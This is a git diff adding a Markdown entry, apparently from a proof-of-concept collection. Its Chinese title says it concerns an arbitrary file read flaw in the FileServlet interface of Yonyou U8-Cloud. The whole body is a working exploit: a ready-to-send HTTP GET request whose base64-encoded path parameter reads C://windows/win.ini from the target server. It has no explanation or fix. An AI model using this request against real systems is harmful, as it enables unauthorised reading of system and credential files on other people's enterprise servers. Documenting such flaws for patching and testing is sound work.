diff --git a/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md b/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..f9505bf --- /dev/null +++ b/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md @@ -0,0 +1,9 @@ +## 用友U8-Cloud接口FileServlet存在任意文件读取漏洞 + + +## poc +``` +GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1 +Host: url + +```